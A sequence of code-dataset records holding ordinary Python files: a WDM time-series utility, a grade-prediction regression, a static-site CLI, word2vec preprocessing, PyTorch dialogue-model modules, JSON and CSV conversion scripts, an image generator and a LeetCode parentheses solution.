Instead the first year of the series is {1}.\n*\n\"\"\".format(dsn_desc['base_year'], llsdat[0]))\n\n nval = len(data)\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 58)\n retcode = self.wdtput(\n wdmfp,\n dsn,\n tstep,\n llsdat,\n nval,\n 1,\n 0,\n tcode,\n data)\n lock.release()\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdtput')\n\n def read_dsn(self, wdmpath, dsn, start_date=None, end_date=None):\n \"\"\"Read from a DSN.\"\"\"\n if not os.path.exists(wdmpath):\n raise ValueError(\"\"\"\n***\n*** {0} does not exist.\n***\n\"\"\".format(wdmpath))\n\n # Call wdatim_ to get LLSDAT, LLEDAT, TSTEP, TCODE\n desc_dsn = self.describe_dsn(wdmpath, dsn)\n\n llsdat = desc_dsn['llsdat']\n lledat = desc_dsn['lledat']\n tcode = desc_dsn['tcode']\n tstep = desc_dsn['tstep']\n tsfill = desc_dsn['tsfill']\n\n # These calls convert 24 to midnight of the next day\n self.timcvt(llsdat)\n self.timcvt(lledat)\n\n if start_date is not None:\n start_date = self.dateconverter(start_date)\n start_date = datetime.datetime(*start_date)\n if start_date > datetime.datetime(*lledat):\n raise ValueError(\"\"\"\n*\n* The requested start date ({0}) is after the end date ({1})\n* of the time series in the WDM file.\n*\n\"\"\".format(start_date, datetime.datetime(*lledat)))\n\n if end_date is not None:\n end_date = self.dateconverter(end_date)\n end_date = datetime.datetime(*end_date)\n if end_date < datetime.datetime(*llsdat):\n raise ValueError(\"\"\"\n*\n* The requested end date ({0}) is before the start date ({1})\n* of the time series in the WDM file.\n*\n\"\"\".format(end_date, datetime.datetime(*llsdat)))\n\n iterm = self.timdif(llsdat,\n lledat,\n tcode,\n tstep)\n\n dtran = 0\n qualfg = 30\n # Get the data and put it into dictionary\n wdmfp = self._open(wdmpath, 59, ronwfg=1)\n dataout, retcode = self.wdtget(\n wdmfp,\n dsn,\n tstep,\n llsdat,\n iterm,\n dtran,\n qualfg,\n tcode)\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdtget')\n\n index = pd.date_range(datetime.datetime(*llsdat),\n periods=iterm,\n freq='{0:d}{1}'.format(tstep, MAPTCODE[tcode]))\n\n # Convert time series to pandas DataFrame\n tmpval = pd.DataFrame(\n pd.Series(\n dataout,\n index=index,\n name='{0}_DSN_{1}'.format(\n os.path.basename(wdmpath), dsn)), dtype=pd.np.float64)\n\n tmpval = tsutils.common_kwds(tmpval,\n start_date=start_date,\n end_date=end_date)\n tmpval.replace(tsfill, pd.np.nan, inplace=True)\n tmpval.index.name = 'Datetime'\n return tmpval\n\n def read_dsn_por(self, wdmpath, dsn):\n \"\"\"Read the period of record for a DSN.\"\"\"\n return self.read_dsn(wdmpath, dsn, start_date=None, end_date=None)\n\n def _close(self, wdmpath):\n \"\"\"Close the WDM file.\"\"\"\n wdmpath = wdmpath.strip()\n if wdmpath in self.openfiles:\n retcode = self.wdflcl(self.openfiles[wdmpath])\n self._retcode_check(retcode, additional_info='wdflcl')\n self.openfiles.pop(wdmpath)\n\n\nif __name__ == '__main__':\n wdm_obj = WDM()\n fname = 'test.wdm'\n if os.name == 'nt':\n fname = r'c:\\test.wdm'\n wdm_obj.create_new_wdm(fname, overwrite=True)\n listonumbers = [34.2, 35.0, 36.9, 38.2, 40.2, 20.1, 18.4, 23.6]\n wdm_obj.create_new_dsn(fname,\n 1003,\n tstype='EXAM',\n scenario='OBSERVED',\n tcode=4,\n location='EXAMPLE')\n dr = pd.date_range(start='2000-01-01', freq='D', periods=len(listonumbers))\n df = pd.DataFrame(listonumbers, index=dr)\n wdm_obj.write_dsn(fname, 1003, df)\n print(wdm_obj.read_dsn_por(fname, 
1003))\n","sub_path":"wdmtoolbox/wdmutil.py","file_name":"wdmutil.py","file_ext":"py","file_size_in_byte":25340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292320867","text":"import tensorflow\nimport keras\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as pyplot\nimport pickle\nfrom matplotlib import style\nimport sklearn.model_selection\nfrom sklearn import linear_model\n\n\ndata = pd.read_csv(\"student-mat.csv\", sep=\";\")\n\ndata = data[[\"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\"]]\n\npredict = \"G3\"\n\nx = np.array(data.drop([predict], 1))\ny = np.array(data[predict])\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(x, y, test_size=0.1)\n\nlinear = linear_model.LinearRegression()\n\nlinear.fit(x_train, y_train)\nacc = linear.score(x_test, y_test)\nprint(acc, \"\\n\") # accuracy when compared to test set.\nprint(\"------\\n\")\n\n# save trained model\nwith open(\"../models/studentmodel.pickle\", \"wb\") as f:\n pickle.dump(linear, f)\n\n# load trained model\npickle_in = open(\"../models/studentmodel.pickle\", \"rb\")\nlinear = pickle.load(pickle_in)\n\nprint(\"Coefficient: \", linear.coef_,\"\\n\")\nprint(\"Intercept: \", linear.intercept_,\"\\n\")\n\ndata_head = [\"Predicted\", \"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\", \"actual\"]\n\npredictions = linear.predict(x_test)\nfor x in range(len(predictions)):\n print(data_head)\n print(predictions[x], x_test[x], y_test[x], '\\n')\n\np = \"G1\"\nstyle.use(\"ggplot\")\npyplot.scatter(data[p], data[\"G3\"])\npyplot.xlabel(p)\npyplot.ylabel(\"Final grade\")\npyplot.show()","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591003422","text":"#!/usr/bin/python3\n#encoding: utf-8\n\nimport argparse\nfrom sys import argv, exit\nfrom shutil import copyfile\nfrom datetime import date\n\nimport cobra\n\ndef main(argv):\n\t\"\"\"\n\tParse our arguments\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser(description=\"CobraPress Version 0.0.3\")\n\tparser.add_argument(\"--generate\", help=\"Generate the static html\", action=\"store_true\")\n\tparser.add_argument(\"--init\", help=\"Initialize this installation\", action=\"store_true\")\n\tparser.add_argument(\"--new_post\", help=\"Generate a new post\", action=\"store_true\")\n\tparser.add_argument(\"--list\", help=\"List available arguments\", action=\"store_true\")\n\targs = parser.parse_args()\n\n\tif args.generate:\n\t\tgenerate()\n\telif args.init:\n\t\tinitialize()\n\telif args.new_post:\n\t\tnew_post(args.new_post)\n\telif args.list:\n\t\tparser.print_usage()\n\telse:\n\t\tparser.print_help()\n\t\n\treturn\n\ndef generate():\n\t\"\"\"\n\tGenerate the static html\n\t\"\"\"\n\n\tconfig = readconfig()\n\n\tprint(config)\n\tfrom cobra import generate\n\tgenerate.generate(config).generate_html()\n\tprint(\"Done!\")\n\treturn\n\ndef initialize():\n\t\"\"\"\n\tInitialize this installation\n\t\"\"\"\n\n\tcopyfile(\"_config.py\", \"config.py\")\n\t# Prepend some stuff to a new config\n\tf = open(\"_config.py\", 'r')\n\tconfig = f.read()\n\tf.close()\n\n\tf = open(\"config.py\", 'w')\n\tf.write(\"# Use this file to override configurations made in _config.py\\n\\n\")\n\tf.write(config)\n\tf.close()\n\tprint(\"Done!\")\n\treturn\n\ndef new_post(title):\n\t\"\"\"\n\tGenerate a new post\n\t\"\"\"\n\n\tif title == 
True:\n\t\tprint(\"What's the title?\")\n\t\ttitle = input(\"Title: \")\n\n\tfilename = str(date.today().year)+\"-\"+str(date.today().month)+\"-\"+str(date.today().day)+\"-\"+title\n\tpost = open(\"posts/\"+filename, 'a')\n\tpost.write(\"++++\\nTitle: \\\"\" + title + \"\\\"\\nPublish: True\\n++++\")\n\tpost.close()\n\n\tprint(title)\n\tprint(\"Done!\")\n\treturn\n\ndef readconfig():\n\t\"\"\"\n\tRead the config\n\t\"\"\"\n\n\tconfiguration = {}\n\n\timport _config\n\ttry:\n\t\timport config\n\texcept ImportError:\n\t\tprint(\"No config file found!\\nDid you \\\"make init\\\"?\")\n\t\texit(5)\n\n\t# Check, whether there's a custom entry\n\tfor argument in _config.config:\n\t\ttry:\n\t\t\tconfiguration[argument] = config.config[argument]\n\t\texcept:\n\t\t\tconfiguration[argument] = _config.config[argument]\n\n\treturn configuration\n\nif __name__ == \"__main__\":\n\tmain(argv[1:])\n","sub_path":"cobra.py","file_name":"cobra.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248675566","text":"import pandas as pd\nimport gensim\nimport jieba\nfrom gensim.models import Word2Vec\nimport numpy as np\n\ndef read_data(file_path):\n    data = []\n    with open(file_path, \"r\", encoding=\"utf8\") as f:\n        for line in f:\n            data.append(line.strip().split(\"\\t\"))\n    return data\n\n\ndef tokenization(text_list):\n    result = []\n    for text in text_list:\n        text_token = []\n        for word in jieba.cut(str(text)):\n            if word.strip():\n                text_token.append(word)\n        result.append(text_token)\n    return result\n\n\ndef get_freq(text_list, word2id):\n    word_freq = {}\n    for sen in text_list:\n        for word in sen:\n            # count by word id, the same key used in the assignment\n            word_freq[word2id[word]] = word_freq.get(word2id[word], 0) + 1\n    return word_freq\n\n\ndef get_w2v(file_path, size=150, min_count=1, workers=4):\n\n    data = read_data(file_path)\n    corpus = []\n    label = []\n    for ins in data:\n        corpus.append(ins[0])\n        corpus.append(ins[1])\n        label.append(ins[2])\n    corpus = tokenization(corpus)\n    model = Word2Vec(corpus, min_count=min_count, size=size, workers=workers)\n\n    word2id = {}\n    word_emb = np.zeros((1+len(model.wv.index2word), size))\n\n    for i in model.wv.index2word:\n        word2id[i] = len(word2id)+1\n        word_emb[word2id[i]] = model.wv[i]\n\n    word_freq = get_freq(corpus, word2id)\n\n\n    sen1_list = [corpus[i] for i in range(len(corpus)) if i%2==0]\n    sen2_list = [corpus[i] for i in range(len(corpus)) if i%2!=0]\n\n    sen1_list = [[word2id.get(word, 0) for word in sen] for sen in sen1_list]\n    sen2_list = [[word2id.get(word, 0) for word in sen] for sen in sen2_list]\n    print(\"Total sentence pairs: %d\\nTotal words: %d\\nword embedding dimension: %d\"%(len(sen1_list), len(word2id), size))\n    return sen1_list, sen2_list, word_emb, word2id, word_freq, label\n","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248226129","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : Lysander Tseng\n# Email : 2474798826@qq.com\n# Time : 2020/2/5 21:46\n# User : Magic\n# Product : PyCharm\n# Project : 019\n# File : 019.1.py\n# Intro : No Description\n\n\ndef cha_classify_stat(*string):\n    \"\"\"多字符串字符分类统计\"\"\"\n    length = len(string)\n    for i in range(length):\n        letter = num = space = symbol = 0\n        for j in string[i]:\n            if 'A' <= j <= 'Z' or 'a' <= j <= 'z':\n                letter += 1\n            elif '0' <= j <= '9':\n                num += 1\n            elif j == ' ':\n                space += 1\n            else:\n                symbol += 1\n        
print(\"第%d个字符串共有:英文字母%d个,数字%d个,\\\n空格%d个,其它字符%d个。\" % (i+1, letter, num, space, symbol))\n\n\nraw_string = input(\"请输入一个或多个字符串(以TAB键隔开):\")\nprocessed_string = raw_string.split(\"\\t\")\nprint(processed_string)\ncha_classify_stat(*processed_string)\n","sub_path":"Python/Homework/019/019.1.py","file_name":"019.1.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633427528","text":"import random\nimport torch.nn as nn\nimport torch\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\n\nfrom .utils import on_cuda, StackedLSTMCell, StackedGRUCell\n\n\nclass BaseRNNEncoder(nn.Module):\n def __init__(self):\n super(BaseRNNEncoder, self).__init__()\n\n @property\n def use_lstm(self):\n if hasattr(self, 'rnn'):\n return isinstance(self.rnn, nn.LSTM)\n else:\n raise AttributeError('no rnn selected')\n\n # Return RNN initial state.\n def init_h(self, batch_size=None, hidden=None):\n if hidden is not None:\n return hidden\n\n if self.use_lstm:\n return (on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size)),\n on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size)))\n else:\n return on_cuda(torch.zeros(self.num_layers * self.num_dir,\n batch_size,\n self.hidden_size))\n\n def batch_size(self, inputs=None, h=None):\n \"\"\"\n inputs: [batch_size, seq_len]\n h: [num_layers, batch_size, hidden_size] (RNN/GRU)\n h_c: [2, num_layers, batch_size, hidden_size] (LSTM)\n \"\"\"\n if inputs is not None:\n batch_size = inputs.size(0)\n return batch_size\n\n else:\n if self.use_lstm:\n batch_size = h[0].size(1)\n else:\n batch_size = h.size(1)\n return batch_size\n\n def forward(self):\n raise NotImplementedError\n\n\nclass BaseRNNDecoder(BaseRNNEncoder):\n def __init__(self):\n super(BaseRNNDecoder, self).__init__()\n\n @property\n def use_lstm(self):\n return isinstance(self.rnncell, StackedLSTMCell)\n\n # Return RNN initial state.\n def init_h(self, batch_size=None, hidden=None):\n if hidden is not None:\n return hidden\n\n if self.use_lstm:\n return (on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size)),\n on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size)))\n else:\n return on_cuda(torch.zeros(self.num_layers,\n batch_size,\n self.hidden_size))\n\n def decode(self, out):\n \"\"\"\n Args:\n out: unnormalized word distribution [batch_size, vocab_size]\n Return:\n x: word_index [batch_size]\n \"\"\"\n\n # Sample next word from multinomial word distribution\n if self.sample:\n # x: [batch_size] - word index (next input)\n x = torch.multinomial(self.softmax(out / self.temperature), 1).view(-1)\n # Greedy sampling\n else:\n # x: [batch_size] - word index (next input)\n _, x = out.max(dim=1)\n return x\n\n # Embed a word, and mask it with word dropout chance.\n def embed(self, x):\n if self.training and self.input_drop > 0.0:\n if random.random() < self.input_drop:\n embed = self.embedding(on_cuda(x.data.new([self.UNK_ID] * x.size(0))))\n else:\n embed = self.embedding(x)\n else:\n embed = self.embedding(x)\n\n return embed\n\n def forward(self):\n raise NotImplementedError\n\n # Run rnn single step.\n def forward_step(self):\n raise NotImplementedError\n\n\n# Sentence-level encoder.\nclass EncoderRNN(BaseRNNEncoder):\n def __init__(self, config, vocab_size, PAD):\n super(EncoderRNN, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_size = config[\"esz\"]\n self.hidden_size = 
config[\"ehs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.batch_first = config[\"b_first\"]\n self.bidirectional = config[\"bi\"]\n\n if config[\"bi\"]:\n self.num_dir = 2\n else:\n self.num_dir = 1\n\n self.embedding = nn.Embedding(vocab_size, config[\"esz\"], padding_idx=PAD)\n self.rnn = nn.GRU(input_size=config[\"esz\"],\n hidden_size=config[\"ehs\"],\n num_layers=config[\"nl\"],\n bias=True,\n batch_first=config[\"b_first\"],\n dropout=config[\"dr\"],\n bidirectional=config[\"bi\"])\n\n def forward(self, inputs, input_length, hidden=None):\n \"\"\"\n Args:\n inputs (Variable, LongTensor): [num_setences, max_seq_len]\n input_length (Variable, LongTensor): [num_sentences]\n Return:\n outputs (Variable): [max_source_length, batch_size, hidden_size]\n - list of all hidden states\n hidden ((tuple of) Variable): [num_layers*num_directions, batch_size, hs]\n - last hidden state\n - (h, c) or h\n \"\"\"\n batch_size, seq_len = inputs.size()\n\n # Sort in decreasing order of length for pack_padded_sequence()\n inp_len_sort, indices = input_length.sort(descending=True)\n inp_len_sort = inp_len_sort.data.tolist()\n\n # [num_sentences, max_source_length]\n inputs_sorted = inputs.index_select(0, indices)\n\n # [num_sentences, max_source_length, embedding_dim]\n embedded = self.embedding(inputs_sorted)\n\n # batch_first=True\n rnn_input = pack_padded_sequence(embedded, inp_len_sort, self.batch_first)\n\n hidden = self.init_h(batch_size, hidden=hidden)\n\n self.rnn.flatten_parameters()\n outputs, hidden = self.rnn(rnn_input, hidden)\n outputs, outputs_lengths = pad_packed_sequence(outputs, self.batch_first)\n\n # Reorder outputs and hidden\n _, inverse_indices = indices.sort()\n outputs = outputs.index_select(0, inverse_indices)\n\n if self.use_lstm:\n hidden = (hidden[0].index_select(1, inverse_indices),\n hidden[1].index_select(1, inverse_indices))\n else:\n hidden = hidden.index_select(1, inverse_indices)\n\n return outputs, hidden\n\n\n# Context level encoder.\nclass ContextRNN(BaseRNNEncoder):\n def __init__(self, config, context_input_size, bi=False):\n super(ContextRNN, self).__init__()\n\n self.input_size = context_input_size\n self.context_size = config[\"chs\"]\n self.hidden_size = config[\"chs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.bidirectional = bi\n self.batch_first = config[\"b_first\"]\n\n if bi:\n self.num_dir = 2\n else:\n self.num_dir = 1\n\n self.rnn = nn.GRU(input_size=context_input_size,\n hidden_size=config[\"chs\"],\n num_layers=config[\"nl\"],\n bias=True,\n batch_first=config[\"b_first\"],\n dropout=config[\"dr\"],\n bidirectional=bi)\n\n def forward(self, encoder_hidden, conv_length, hidden=None):\n \"\"\"\n Args:\n encoder_hidden (Variable): [bs, max_len, num_layers * direction * hs]\n conversation_length (Variable): [batch_size]\n Return:\n outputs (Variable): [batch_size, max_seq_len, hidden_size]\n - list of all hidden states\n hidden ((tuple of) Variable): [num_layers*num_directions, batch_size, hs]\n - last hidden state\n - (h, c) or h\n \"\"\"\n batch_size, seq_len, _ = encoder_hidden.size()\n\n # Sort for PackedSequence\n conv_length_sorted, indices = conv_length.sort(descending=True)\n conv_length_sorted = conv_length_sorted.data.tolist()\n enc_hidden_sorted = encoder_hidden.index_select(0, indices)\n\n # Pack and run through RNN.\n hidden = self.init_h(batch_size, hidden=hidden)\n rnn_input = pack_padded_sequence(enc_hidden_sorted,\n conv_length_sorted,\n batch_first=True)\n 
self.rnn.flatten_parameters()\n outputs, hidden = self.rnn(rnn_input, hidden)\n\n # outputs: [batch_size, max_conversation_length, context_size]\n outputs, outputs_length = pad_packed_sequence(outputs, batch_first=True)\n\n # reorder outputs and hidden\n _, inverse_indices = indices.sort()\n outputs = outputs.index_select(0, inverse_indices)\n\n if self.use_lstm:\n hidden = (hidden[0].index_select(1, inverse_indices),\n hidden[1].index_select(1, inverse_indices))\n else:\n hidden = hidden.index_select(1, inverse_indices)\n\n return outputs, hidden\n\n def step(self, encoder_hidden, hidden):\n\n batch_size = encoder_hidden.size(0)\n # encoder_hidden: [1, batch_size, hidden_size]\n encoder_hidden = torch.unsqueeze(encoder_hidden, 1)\n\n if hidden is None:\n hidden = self.init_h(batch_size, hidden=None)\n\n outputs, hidden = self.rnn(encoder_hidden, hidden)\n return outputs, hidden\n\n\n# Decoder.\nclass DecoderRNN(BaseRNNDecoder):\n def __init__(self, config, vocab_size, START_ID, UNK_ID):\n super(DecoderRNN, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_size = config[\"esz\"]\n self.hidden_size = config[\"dhs\"]\n self.num_layers = config[\"nl\"]\n self.dropout = config[\"dr\"]\n self.input_drop = config[\"idr\"]\n self.temperature = config[\"temp\"]\n self.max_unroll = config[\"max_unroll\"]\n self.sample = config[\"sample\"]\n self.START_ID = START_ID\n self.UNK_ID = UNK_ID\n\n self.embedding = nn.Embedding(vocab_size, config[\"esz\"])\n self.rnncell = StackedGRUCell(config[\"nl\"],\n config[\"esz\"],\n config[\"dhs\"],\n config[\"dr\"])\n self.out = nn.Linear(config[\"dhs\"], vocab_size)\n self.softmax = nn.Softmax(dim=1)\n\n def forward_step(self, x, h):\n \"\"\"\n Single RNN Step\n 1. Input Embedding (vocab_size => hidden_size)\n 2. RNN Step (hidden_size => hidden_size)\n 3. 
Output Projection (hidden_size => vocab size)\n\n Args:\n x: [batch_size]\n h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n\n Return:\n out: [batch_size,vocab_size] (Unnormalized word distribution)\n h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n \"\"\"\n # x: [batch_size] => [batch_size, hidden_size]\n x = self.embed(x)\n\n # last_h: [batch_size, hidden_size] (h from Top RNN layer)\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n last_h, h = self.rnncell(x, h)\n\n if self.use_lstm:\n # last_h_c: [2, batch_size, hidden_size] (h from Top RNN layer)\n # h_c: [2, num_layers, batch_size, hidden_size] (h and c from all layers)\n last_h = last_h[0]\n\n # Unormalized word distribution\n # out: [batch_size, vocab_size]\n out = self.out(last_h)\n return out, h\n\n def forward(self, inputs, init_h=None, decode=False):\n \"\"\"\n Train (decode=False)\n Args:\n inputs (Variable, LongTensor): [batch_size, seq_len]\n init_h: (Variable, FloatTensor): [num_layers, batch_size, hidden_size]\n Return:\n out : [batch_size, seq_len, vocab_size]\n Test (decode=True)\n Args:\n inputs: None\n init_h: (Variable, FloatTensor): [num_layers, batch_size, hidden_size]\n Return:\n out : [batch_size, seq_len]\n \"\"\"\n batch_size = self.batch_size(inputs, init_h)\n\n # x: [batch_size]\n x = on_cuda(torch.LongTensor([self.START_ID] * batch_size))\n\n # h: [num_layers, batch_size, hidden_size]\n h = self.init_h(batch_size, hidden=init_h)\n\n if not decode:\n out_list = []\n seq_len = inputs.size(1)\n\n for i in range(seq_len):\n # x: [batch_size]\n # =>\n # out: [batch_size, vocab_size]\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n out, h = self.forward_step(x, h)\n out_list.append(out)\n x = inputs[:, i]\n # [batch_size, max_target_len, vocab_size]\n return torch.stack(out_list, dim=1)\n else:\n x_list = []\n for i in range(self.max_unroll):\n # x: [batch_size]\n # =>\n # out: [batch_size, vocab_size]\n # h: [num_layers, batch_size, hidden_size] (h and c from all layers)\n out, h = self.forward_step(x, h)\n\n # out: [batch_size, vocab_size]\n # => x: [batch_size]\n x = self.decode(out)\n x_list.append(x)\n\n # [batch_size, max_target_len]\n return torch.stack(x_list, dim=1)\n\n\nclass FeedForward(nn.Module):\n def __init__(self, config, input_size, output_size, num_layers=1, hs=None):\n super(FeedForward, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hs\n self.num_layers = num_layers\n self.activation = getattr(nn, config[\"activ\"])()\n\n # Set linear layers.\n n_inputs = [input_size] + [hs] * (num_layers - 1)\n n_outputs = [hs] * (num_layers - 1) + [output_size]\n self.linears = nn.ModuleList(\n [nn.Linear(n_in, n_out, bias=True)\n for n_in, n_out in zip(n_inputs, n_outputs)])\n\n def forward(self, x):\n for linear in self.linears:\n x = linear(x)\n x = self.activation(x)\n\n return x\n","sub_path":"parlai/agents/vhcr/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"322920377","text":"import json\n\nfor iseason in [0, 1, 2, 3, 4]:\n\n # Confirm isPostseason is present and isPlayoffs is not\n # Confirm team1PostseasonWinLoss is present and team1PlayoffsWinLoss is not\n\n ###############\n # schedule\n with open('season%d/schedule.json'%(iseason), 'r') as f:\n schedule = json.load(f)\n\n for day in schedule:\n for game in day:\n if 
'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n\n scheduleout = 'season%d/new_schedule.json'%(iseason)\n with open(scheduleout, 'w') as f:\n json.dump(schedule, f, indent=4)\n print(f\"Wrote new schedule without isPlayoffs to {scheduleout}\")\n\n\n ###############\n # season\n with open('season%d/season.json'%(iseason), 'r') as f:\n season = json.load(f)\n\n for day in season:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n\n seasonout = 'season%d/new_season.json'%(iseason)\n with open(seasonout, 'w') as f:\n json.dump(season, f, indent=4)\n print(f\"Wrote new season without isPlayoffs to {seasonout}\")\n\n\n ###############\n # bracket\n with open('season%d/bracket.json'%(iseason), 'r') as f:\n bracket = json.load(f)\n\n for series in bracket:\n miniseason = bracket[series]\n for day in miniseason:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n if 'team1PlayoffsWinLoss' in game:\n if 'team1PostseasonWinLoss' not in game:\n game['team1PostseasonWinLoss'] = game['team1PlayoffsWinLoss']\n del game['team1PlayoffsWinLoss']\n if 'team2PlayoffsWinLoss' in game:\n if 'team2PostseasonWinLoss' not in game:\n game['team2PostseasonWinLoss'] = game['team2PlayoffsWinLoss']\n del game['team2PlayoffsWinLoss']\n\n bracketout = 'season%d/new_bracket.json'%(iseason)\n with open(bracketout, 'w') as f:\n json.dump(bracket, f, indent=4)\n print(f\"Wrote new bracket without isPlayoffs/teamXPlayoffsWins to {bracketout}\")\n\n ###############\n # playoffs\n with open('season%d/postseason.json'%(iseason), 'r') as f:\n postseason = json.load(f)\n\n for series in postseason:\n miniseason = postseason[series]\n for day in miniseason:\n for game in day:\n if 'isPlayoffs' in game:\n if 'isPostseason' not in game:\n game['isPostseason'] = game['isPlayoffs']\n del game['isPlayoffs']\n if 'team1PlayoffsWinLoss' in game:\n if 'team1PostseasonWinLoss' not in game:\n game['team1PostseasonWinLoss'] = game['team1PlayoffsWinLoss']\n del game['team1PlayoffsWinLoss']\n if 'team2PlayoffsWinLoss' in game:\n if 'team2PostseasonWinLoss' not in game:\n game['team2PostseasonWinLoss'] = game['team2PlayoffsWinLoss']\n del game['team2PlayoffsWinLoss']\n\n postout = 'season%d/new_post.json'%(iseason)\n with open(postout, 'w') as f:\n json.dump(postseason, f, indent=4)\n print(f\"Wrote new postseason without isPlayoffs/teamXPlayoffsWins to {postout}\")\n\n\n","sub_path":"scripts/remove_playoffs.py","file_name":"remove_playoffs.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"206915848","text":"import sys\nimport json\nimport io\nimport os\n\ncode_file=open(\"app/controllers/temp/code.txt\",\"r\")\n#code_file=open(\"code.txt\",\"r\")\ncode = code_file.read().splitlines()\ncode_file.close()\ncode=''.join(code)\ncode=code.zfill(6)\n\ninput_file = 'app/controllers/temp/history_' + code + '.csv'\nlines = io.open(input_file, \"r\", encoding=\"utf_8_sig\").readlines()\n\nlines = [line.strip() for line in lines]\n\nkeys = lines[0].split(',')\n\n\nline_num = 1\ntotal_lines = len(lines)\n\nparsed_datas = []\nwhile line_num < total_lines:\n values = lines[line_num].split(\",\")\n values[1] = str(values[1])\n parsed_datas.append(dict(zip(keys, values)))\n\n line_num = line_num 
+ 1\n\njson_str = json.dumps(parsed_datas, ensure_ascii=False, indent=4)\n#output_file = input_file.replace(\"csv\", \"json\")\noutput_file = 'app/controllers/temp/data/history/history_' + code + '.json'\n\nf = open(output_file, \"w\")\nf.write(json_str)\nf.close()\n\n#os.remove(input_file)\n","sub_path":"app/controllers/temp/history/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543182182","text":"from __future__ import print_function\nfrom PIL import Image\nfrom math import sqrt, pow, sin\n\nim = Image.open(\"img1.jpg\")\npixels1 = im.load()\n\ncx = im.size[0] // 2\ncy = im.size[1] // 2\n\n# visit every pixel in the image\nfor x in range(0, im.size[0]):\n\tfor y in range(0, im.size[1]):\n\t\tvalor = sin( 0.1 * sqrt( pow(x-cx,2) + pow(y-cy,2) ))\n\t\tif valor <= 0:\n\t\t\t# assumed intent: use the magnitude of the (negative) sine value as an integer gray level\n\t\t\tg = int(-valor * 255)\n\t\t\tpixels1[x,y] = (g, g, g)\n\t\telse:\n\t\t\tpixels1[x,y] = (255,255,255)\nim.save(\"superfice.jpg\")","sub_path":"fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342431861","text":"'''\n给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n\n有效字符串需满足:\n\n左括号必须用相同类型的右括号闭合。\n左括号必须以正确的顺序闭合。\n注意空字符串可被认为是有效字符串。\n\n示例 1:\n\n输入: \"()\"\n输出: true\n示例 2:\n\n输入: \"()[]{}\"\n输出: true\n示例 3:\n\n输入: \"(]\"\n输出: false\n示例 4:\n\n输入: \"([)]\"\n输出: false\n示例 5:\n\n输入: \"{[]}\"\n输出: true\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/valid-parentheses\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass Solution:\n    def isValid(self, s: str) -> bool:\n        if s==\"\":\n            return True\n        elif s[0]==\")\" or s[0]==\"]\" or s[0]==\"}\":\n            return False\n        stack = []\n        d = {\")\":\"(\",\"]\":\"[\",\"}\":\"{\"}\n        for i in s:\n            if i==\"(\" or i==\"[\" or i==\"{\":\n                stack.append(i)\n            else:\n                if stack==[]:\n                    return False\n                if stack.pop()!=d[i]:\n                    return False\n        return stack==[]\n","sub_path":"栈/20. 
